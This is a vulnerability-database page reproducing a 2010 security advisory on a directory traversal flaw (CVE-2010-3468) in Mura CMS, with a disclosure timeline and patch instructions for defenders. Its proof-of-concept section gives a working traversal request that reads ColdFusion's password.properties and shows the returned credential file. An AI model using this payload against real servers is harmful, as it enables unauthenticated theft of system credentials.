Lucene search
K

Blue River Mura CMS - Directory Traversal

🗓️ 26 Sep 2010 00:00:00Reported by mr_meType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 43 Views

Blue River Mura CMS Directory Traversal - Arbitrary file download issue in Mura CMS permits unauthenticated attacker to access sensitive system files

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2010-3468
26 Sep 201000:00
circl
CVE
CVE-2010-3468
29 Sep 201016:00
cve
Cvelist
CVE-2010-3468
29 Sep 201016:00
cvelist
EUVD
EUVD-2010-3466
7 Oct 202500:30
euvd
exploitpack
Blue River Mura CMS - Directory Traversal
26 Sep 201000:00
exploitpack
Tenable Nessus
Mura CMS FILEID Parameter Directory Traversal
30 Sep 201000:00
nessus
NVD
CVE-2010-3468
29 Sep 201017:00
nvd
Packet Storm
Blue River Mura CMS Directory Traversal
28 Sep 201000:00
packetstorm
Prion
Directory traversal
29 Sep 201017:00
prion
RedhatCVE
CVE-2010-3468
22 May 202504:36
redhatcve
Rows per page
Sep 24, 2010


    * Title: Blue River Mura CMS Directory Traversal
    * Version: 1.0
    * Issue type: Directory Traversal
    * Affected vendor: Blue River Interactive Group
    * Release date: 24/09/2010
    * Discovered by:  Steven Seeley & Rohan Stelling

Summary

Mura CMS is an open source content management system which is built upon the Adobe Cold Fusion platform.

stratsec researchers Rohan Stelling and Steven Seeley have identified an arbitrary file download issue in the Mura CMS as distributed by BlueRiver Interactive Group. The issue permits access to local files on the server.

As a result the vendor has released a patch addressing the issue and notified their customer base. stratsec would like to acknowledge the speedy response time by Blue River Interactive Group, producing a patch within 48 hours of notification.

Description

The ‘fileManager.cfc’ component present in affected Mura CMS versions does not correctly sanitise the ‘FILEID’ parameter before using the parameter to form file paths. As a result it possible for an attacker to supply malicious input which causes a different file to be accessed other than that intended.

Impact

The issue permits an unauthenticated attacker to download arbitrary files from a system exposing an unpatched Mura CMS version. This issue may result in the unauthorised disclosure of sensitive user or system files.

Affected products

 

    * Mura CMS 5.1 < 5.1.498
    * Mura CMS 5.2 < 5.2.2809
    * Sava CMS 5.2 (Unknown)


Proof of concept

Files can be retrieved from the server using a specially crafted URI such as the one given below,
Page: /tasks/render/file/
Parameter: FILEID
Request Type: GET
PoC: http://{hostname}/{mura_ _location}/tasks/render/file/?FILEID=..\..\..\..\..\..\ColdFusion9\lib\password.properties

The resulting HTTP request looks

GET /www/tasks/render/file/?FILEID=..\..\..\..\..\..\ColdFusion9\lib\password.properties HTTP/1.1

The payload will needs to be modified to reference a file on the system, relative to the installation path.
Upon receiving such a request, the server responds with a 200 OK containing the file specified. For the PoC above (retrieving ‘password.properties’) the server returned the following response:

HTTP/1.0 200 OK
Connection: close
Content-Disposition: inline;filename=""
Content-Type: /
Content-Length: 141

#Thu Aug 26 11:24:03 EST 2010
rdspassword=09GTH9 8O&>36& \\Q>[K\=XP  \n
password=5BAA61E4C9B93F3F0682250B6CF8331B7EE68FD8
encrypted=true

Solution

The vendor has provided patches and upgrade instructions which are available from http://www.getmura.com/index.cfm/blog/critical-security-patch/.

Using the Mura CMS auto-updater

 

    * 1. Login to the Mura admin with an account that has super user rights.
    * 2. Once logged in, click the "Site Settings" Link located in the top right of the Mura CMS admin screens.
    * 3. On the main "Site Settings" page that shows the list all of site currently running in your Mura CMS instance click "Update Core Files to Latest Version".
    * 4. Click "Reload Application" in the Mura CMS admin left module nav.


Without the auto updater

Download appropriate software patch and follow the upgrade instructions contained in the ReadMe.txt file.
 

    * Sava 5
      http://www.getmura.com/tasks/sites/v5/assets/File/sava5SecurityPatch1.zip
    * Mura CMS 5.1
      http://www.getmura.com/tasks/sites/v5/assets/File/mura51SecurityPatch1.zip
    * Mura CMS 5.2
      http://www.getmura.com/tasks/sites/v5/assets/File/mura52SecurityPatch1.zip


Response timeline

 

    * 07/09/2010 - Vendor notified.
    * 09/09/2010 - Vendor acknowledges receipt of advisory.
    * 10/09/2010 - Vendor confirms issue presence.
    * 11/09/2010 - Fix released and vendor notifies paid support customers.
    * 11/09/2010 - stratsec confirms patch resolves issue.
    * 11/09/2010 - Advisory publication date agreed as 25/09/2010
    * 15/09/2010 – Vendor publishes a blog post publicly disclosing the vulnerabilities presence.
    * 25/09/2010 - This advisory published.


References

 

    * Vendor advisory: http://www.getmura.com/index.cfm/blog/critical-security-patch/
    * CVE item: CVE-2010-3468

 		 	   		  

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation